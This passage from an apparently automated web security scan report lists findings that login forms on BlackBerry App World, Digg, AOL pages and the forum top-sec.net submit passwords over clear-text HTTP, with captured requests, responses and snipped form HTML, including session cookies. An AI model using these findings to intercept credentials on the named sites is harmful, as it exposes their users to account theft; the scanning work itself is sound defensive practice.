The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /webstore/content/19143 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=37653
Date: Thu, 05 May 2011 13:02:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm1" name="deviceModalsForm1" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm1" value="deviceModalsForm1" />
...[SNIP]...
<td><input id="deviceModalsForm1:inputPassword" type="password" name="deviceModalsForm1:inputPassword" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceAuthenticationWindow\',\'' + $F('deviceModalsForm1:inputPassword') + '\')');" /></td>
...[SNIP]...

8.6. http://appworld.blackberry.com/webstore/content/19143

Summary

Severity:   High
Confidence:   Certain
Host:   http://appworld.blackberry.com
Path:   /webstore/content/19143

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /webstore/content/19143 HTTP/1.1
Host: appworld.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: RIM
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=37653
Date: Thu, 05 May 2011 13:02:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 201199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <script src="/webstore/a
...[SNIP]...
<div>
<form id="deviceModalsForm2" name="deviceModalsForm2" method="post" action="/webstore/content/home.seam" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="deviceModalsForm2" value="deviceModalsForm2" />
...[SNIP]...
<td><input id="deviceModalsForm2:inputPassword3" type="password" name="deviceModalsForm2:inputPassword3" value="" maxlength="32" onkeypress="return enterKeyTrap(event, 'doDeviceConnect(\'deviceInvalidPasswordWindow\',\'' + $F('deviceModalsForm2:inputPassword3') + '\')');" /></td>
...[SNIP]...

8.7. http://digg.com/submit

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-781655937076164456%3A203; expires=Fri, 06-May-2011 10:52:57 GMT; path=/; domain=digg.com
Set-Cookie: d=74a0d936cee33a389ca1110cdc45b54249fb1ab6f82ad32b7390fde3b4b270f3; expires=Tue, 04-May-2021 21:00:37 GMT; path=/; domain=.digg.com
X-Digg-Time: D=25192 10.2.128.235
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8171

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.8. http://o.aolcdn.com/art/merge/

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /art/merge/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /art/merge/?f=/mobileportal/s2c_modal.js&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/?icid=prodserv_mobile_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 00:58:27 GMT
Date: Thu, 05 May 2011 00:58:27 GMT
Connection: close
Content-Length: 27714

eval(function ($) {
$.modal = function (data, options) {
return $.modal.impl.init(data, options);
};
$.modal.close = function () {
$.modal.impl.close(true);
};
$.fn
...[SNIP]...
</span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword">
...[SNIP]...
</label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login">
...[SNIP]...

8.9. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

Summary

Severity:   High
Confidence:   Certain
Host:   http://portalblog.aol.com
Path:   /2011/02/01/aol-across-the-web-and-beyond/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /2011/02/01/aol-across-the-web-and-beyond/ HTTP/1.1
Host: portalblog.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:47 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Astowe%3A%3A044.500%3A%3A-072.646%3A%3Abroadband%3A%3Avt; expires=Thu, 05-May-2011 11:53:47 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:53:46 GMT; path=/
Keep-Alive: timeout=5, max=999990
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 62860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</div>
<form action="#comment" id="commentform" name="commentform" method="post" onsubmit="return inputValidation();">
   <div id="cmttabs">
...[SNIP]...
</label>
       <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/>
   </div>
...[SNIP]...

8.10. http://top-sec.net/vb/

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/ HTTP/1.1
Host: top-sec.net
Proxy-Connection: keep-alive
Referer: http://top-sec.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:05:33 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561133; expires=Fri, 04-May-2012 02:05:33 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 02:05:33 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Content-Type: text/html; charset=windows-1256
Content-Length: 121955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
   <!-
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.11. http://top-sec.net/vb/calendar.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/calendar.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/calendar.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:41 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:41 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:41 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Set-Cookie: bbcalendar=c4871a805a3492ec3258c39f4f4b9902074646b9a-1-%7Bs-7-.calyear._i-2011_%7D; path=/
Set-Cookie: bbcalendar=0902832cd087ecea4266c5df0ae36e34acb696eea-2-%7Bs-7-.calyear._i-2011_s-8-.calmonth._i-5_%7D; path=/
Set-Cookie: bbcalendar=5e8c771b8e4dad9bd1e6ffa8247223b3f9c17be0a-3-%7Bs-7-.calyear._i-2011_s-8-.calmonth._i-5_s-8-.calview1._s-12-.displaymonth._%7D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 61232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.12. http://top-sec.net/vb/faq.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/faq.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/faq.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:47 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:47 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:47 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 38468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.13. http://top-sec.net/vb/forumdisplay.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/forumdisplay.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/forumdisplay.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:47 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:48 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:48 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 47809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.14. http://top-sec.net/vb/index.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/index.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/index.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:48 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:48 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:48 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 113812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
   <!-
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.15. http://top-sec.net/vb/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

POST /vb/login.php?do=login HTTP/1.1
Host: top-sec.net
Proxy-Connection: keep-alive
Referer: http://top-sec.net/vb/member.php?u=3
Cache-Control: max-age=0
Origin: http://top-sec.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131; bblastactivity=0
Content-Length: 206

vb_login_username=%C7%D3%E3+%C7%E1%DA%D6%E6&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f00b204e9800998ec
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:06:33 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 02:06:33 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Content-Type: text/html; charset=windows-1256
Content-Length: 48097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.16. http://top-sec.net/vb/member.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/member.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/member.php?u=3 HTTP/1.1
Host: top-sec.net
Proxy-Connection: keep-alive
Referer: http://top-sec.net/vb/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131; bblastactivity=0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:05:57 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 02:05:57 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Content-Type: text/html; charset=windows-1256
Content-Length: 51381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.17. http://top-sec.net/vb/memberlist.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/memberlist.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/memberlist.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:54 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 63971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.18. http://top-sec.net/vb/online.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/online.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/online.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:54 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 49966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
</script>
           <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
           <input type="hidden" name="do" value="login" />
...[SNIP]...
<br /><input type="password" class="bginput" name="vb_login_password" size="50" tabindex="1" /></td>
...[SNIP]...

8.19. http://top-sec.net/vb/online.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/online.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/online.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:54 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:54 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 49966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.20. http://top-sec.net/vb/profile.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/profile.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/profile.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:55 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:55 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:55 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 49969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
</script>
           <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
           <input type="hidden" name="do" value="login" />
...[SNIP]...
<br /><input type="password" class="bginput" name="vb_login_password" size="50" tabindex="1" /></td>
...[SNIP]...

8.21. http://top-sec.net/vb/profile.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/profile.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/profile.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:55 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:55 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:55 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=windows-1256
Content-Length: 49969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=384">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.22. http://top-sec.net/vb/search.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://top-sec.net
Path:   /vb/search.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vb/search.php HTTP/1.1
Host: top-sec.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bblastactivity=0; bbsessionhash=7cc3f3d098b697ef158c6c96dc4d15b9; bblastvisit=1304561131;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:55:56 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: bblastvisit=1304561131; expires=Fri, 04-May-2012 10:55:56 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Fri, 04-May-2012 10:55:56 GMT; path=/
Cache-Control: private
Pragma: private
